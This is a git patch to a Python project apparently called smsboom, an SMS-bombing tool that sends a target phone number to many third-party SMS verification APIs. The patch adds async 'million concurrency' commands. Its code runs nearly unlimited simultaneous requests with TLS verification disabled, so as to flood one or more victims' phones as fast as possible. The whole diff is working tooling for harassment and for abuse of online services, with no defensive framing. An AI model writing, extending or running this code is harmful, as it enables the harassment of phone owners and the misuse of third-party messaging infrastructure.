From 8a3d1486dd553d057ebd70e2185292fe4b8df2c5 Mon Sep 17 00:00:00 2001 From: AdminWhaleFall Date: Sat, 14 May 2022 18:59:59 +0800 Subject: [PATCH] =?UTF-8?q?=E2=9C=A8=20feat:=20=E4=BD=BF=E7=94=A8=E5=BC=82?= =?UTF-8?q?=E6=AD=A5=E5=AE=9E=E7=8E=B0=E7=9C=9F=E7=99=BE=E4=B8=87=E5=B9=B6?= =?UTF-8?q?=E5=8F=91?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- flask_app/utils.py | 12 +------ smsboom.py | 33 +++++++++++++++++++- utils/req.py | 78 ++++++++++++++++++++++++++++++++++++++++++---- 3 files changed, 105 insertions(+), 18 deletions(-) diff --git a/flask_app/utils.py b/flask_app/utils.py index d828148..8d85dea 100755 --- a/flask_app/utils.py +++ b/flask_app/utils.py @@ -1,6 +1,5 @@ # encoding=utf8 import httpx -# import requests from .model import API, default_header @@ -24,16 +23,7 @@ def test_resq(api: API, phone) -> httpx.Response: print('json') resp = client.request( method=api.method, headers=api.header, url=api.url, json=api.data) - - # 验证不是 httpx 的问题... - # if not isinstance(api.data, dict): - # print("data") - # resp = requests.request(method=api.method, headers=api.header, - # url=api.url, data=api.data) - # else: - # print('json') - # resp = requests.request( - # method=api.method, headers=api.header, url=api.url, json=api.data) + return resp diff --git a/smsboom.py b/smsboom.py index af5d30d..cf2ca62 100755 --- a/smsboom.py +++ b/smsboom.py @@ -6,6 +6,7 @@ import sys import time from concurrent.futures import ThreadPoolExecutor from typing import List, Union +import asyncio import click import httpx @@ -13,7 +14,7 @@ import httpx from utils import default_header from utils.log import logger from utils.models import API -from utils.req import reqFunc +from utils.req import reqFunc, runAsync # current directory path = pathlib.Path(__file__).parent @@ -43,6 +44,7 @@ def load_json() -> List[API]: # return None raise ValueError + def load_getapi() -> list: """load GETAPI :return: @@ -99,6 +101,33 @@ def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = Fals pool.submit(reqFunc, api_get, phone) +@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True) +@click.command() +def asyncRun(phone): + """以最快的方式请求接口(真异步百万并发)""" + _api = load_json() + _api_get = load_getapi() + apis = _api+_api_get + + loop = asyncio.get_event_loop() + loop.run_until_complete(runAsync(apis, phone)) + + +@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True) +@click.command() +def oneRun(phone): + """单线程(测试使用)""" + _api = load_json() + _api_get = load_getapi() + apis = _api+_api_get + + for api in apis: + try: + reqFunc(api, phone) + except: + pass + + @click.command() def update(): """从 github 获取最新接口""" @@ -130,6 +159,8 @@ def cli(): cli.add_command(run) cli.add_command(update) +cli.add_command(asyncRun) +cli.add_command(oneRun) if __name__ == "__main__": diff --git a/utils/req.py b/utils/req.py index 469fd58..f304355 100644 --- a/utils/req.py +++ b/utils/req.py @@ -1,24 +1,26 @@ # encoding=utf8 # 请求的方法 import httpx -from typing import Union +from httpx import Limits +from typing import Union, List +import asyncio from utils import default_header from utils.models import API from utils.log import logger -def reqAPI(api: API, client: httpx.Client) -> httpx.Response: +def reqAPI(api: API, client: Union[httpx.Client, httpx.AsyncClient]) -> httpx.Response: if isinstance(api.data, dict): resp = client.request(method=api.method, json=api.data, - headers=api.header, url=api.url) + headers=api.header, url=api.url, timeout=10) else: resp = client.request(method=api.method, data=api.data, - headers=api.header, url=api.url) + headers=api.header, url=api.url, timeout=10) return resp -def reqFunc(api: Union[API, str], phone: Union[tuple, str]): +def reqFunc(api: Union[API, str], phone: Union[tuple, str]) -> bool: """请求接口方法""" # 多手机号支持 if isinstance(phone, tuple): @@ -34,10 +36,74 @@ def reqFunc(api: Union[API, str], phone: Union[tuple, str]): resp = reqAPI(api, client) logger.info(f"{api.desc}-{resp.text[:30]}") else: - api = api.replace("[phone]", ph) + api = api.replace("[phone]", ph).replace(" ", "").replace('\n', '').replace('\r', '') resp = client.get(url=api, headers=default_header) logger.info(f"GETAPI接口-{resp.text[:30]}") return True except httpx.HTTPError as why: logger.error(f"请求失败{why}") return False + + +async def asyncReqs(src: Union[API, str], phone: Union[tuple, str], semaphore): + """异步请求方法 + :param: + :return: + """ + # 多手机号支持 + if isinstance(phone, tuple): + phone_lst = [_ for _ in phone] + else: + phone_lst = [phone] + async with semaphore: + async with httpx.AsyncClient( + limits=Limits(max_connections=1000, + max_keepalive_connections=2000), + headers=default_header, + verify=False, + timeout=99999 + ) as c: + + for ph in phone_lst: + try: + if isinstance(src, API): + src = src.handle_API(ph) + r = await reqAPI(src, c) + else: + # 利用元组传参安全因为元组不可修改 + s = (src.replace(" ", "").replace("\n", "").replace("\t", "").replace( + "&", "").replace('\n', '').replace('\r', ''),) + r = await c.get(*s) + return r + except httpx.HTTPError as why: + logger.error(f"异步请求失败{type(why)}") + # logger.error(f"异步请求失败{why}") + # import aiofiles + # async with aiofiles.open("error.txt","a",encoding="utf-8") as f: + # await f.write(f"{str(s[0]) if str(s[0]) else str(src)}\n") + except TypeError: + logger.error("类型错误") + except Exception as wy: + logger.exception(f"异步失败{wy}") + + +def callback(result): + """异步回调函数""" + log = result.result() + if log is not None: + logger.info(f"请求结果:{log.text[:30]}") + + +async def runAsync(apis: List[Union[API,str]], phone: Union[tuple, str]): + + tasks = [] + + for api in apis: + semaphore = asyncio.Semaphore(999999) + task = asyncio.ensure_future(asyncReqs(api, phone, semaphore)) + task.add_done_callback(callback) + tasks.append(task) + + await asyncio.gather( + *tasks + )